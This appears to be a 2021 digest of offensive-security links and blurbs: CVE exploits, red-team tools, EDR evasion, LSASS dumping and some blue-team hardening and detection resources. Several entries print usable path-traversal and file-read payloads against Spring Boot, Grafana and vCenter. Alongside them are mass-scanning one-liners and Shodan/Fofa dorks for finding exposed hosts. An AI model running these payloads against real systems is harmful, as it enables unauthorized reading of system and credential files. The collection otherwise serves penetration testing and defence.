ManageEngine ADSelfService Plus — Authentication Bypass (CVE-2021-40539)

Details:
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html

Exploit:
https://github.com/synacktiv/CVE-2021-40539

#adselfservice #cve #auth #bypass

CHAPS — Configuration Hardening Assessment PowerShell Script

CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment.

https://github.com/cutaway-security/chaps

#powershell #hardening #assessment #blueteam

Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)

https://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../

Details:
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/

#spring #actuator #cve #bugbounty

VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Shodan Dorks:
http.title:"ID_VC_Welcome"

Zoomeye Dorks:
app:"VMware vCenter"

https://github.com/l0ggg/VMware_vCenter

#vmware #vcenter #bugbounty

Webapp Wordlists

This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

https://github.com/p0dalirius/webapp-wordlists

#wordlist #cms #bugbounty

OffensiveNim — PowerShell

Using Nim to load the CLR and execute PowerShell without the need for PowerShell.exe, now with printing the output as well!

https://github.com/Alh4zr3d/OffensiveNim/blob/master/src/execute_powershell_bin.nim

#offensive #nim #powershell

Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver (CVE-2021-42008)

CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access.

https://syst3mfailure.io/sixpack-slab-out-of-bounds

#linux #6pack #lpe #cve

KeyHacks

Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.

https://github.com/streaak/keyhacks

#api #key #check #bugbounty

jq + grep + fzf + curl = SharpCollection

https://github.com/Flangvik/SharpCollection

alias SharpCollection='print -z `curl -sSL "https://api.github.com/repos/Flangvik/SharpCollection/git/trees/master?recursive=1" | jq -r ".tree[].path" | grep \\.exe | while read line; do echo "curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/$line >"; done | fzf --tac`'

#csharp #collection #tooling

UAC bypass - DLL hijacking

This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.

https://github.com/SecuProject/DLLHijackingScanner

#uac #bypass #dll #hijacking

Phant0m — Windows Event Log Killer

Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs.

https://github.com/hlldz/Phant0m

#windows #events #log #killer

Rodan Telecom Exploitation Framework

Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP.

https://github.com/Etisalat-Egypt/Rodan

#telecom #ss7 #gtp #sip

Design Issues Of Modern EDRs: Bypassing ETW-Based Solutions

https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html

#etw #redteam #blueteam #malware

PowerRunAsAttached

This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window).

Example:
Invoke-RunAsAttached -Username "darkcodersc" -Password "testmepliz"

https://github.com/DarkCoderSc/PowerRunAsAttached

#runas #powershell #pentest #tools

Grafana — Unauthorized Arbitrary Read File

The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+

Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC
https://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini

The "plugin-id" could be any plugin that exists in the system

One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest

Abusing Leaked Handles to Dump LSASS Memory

# https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html

# https://github.com/antonioCoco/MalSeclogon

#seclogon #lsass #dump #redteam

Extracting passwords from hiberfil.sys

When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text.

https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps

#hiberfil #dump #password

EDRSandBlast

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

https://github.com/wavestone-cdt/EDRSandblast

#lsass #dump #etw #redteam

Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019

How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.

https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/

#kerberos #windows2019 #pentest

MAL-CL — Malicious Command-Line

MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.

https://github.com/3CORESec/MAL-CL

#windows #cli #detection #blueteam #redteam

Process Ghosting — EDR Evasion

The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique.

https://pentestlaboratories.com/2021/12/08/process-ghosting/

#av #evasion #process #redteam #blueteam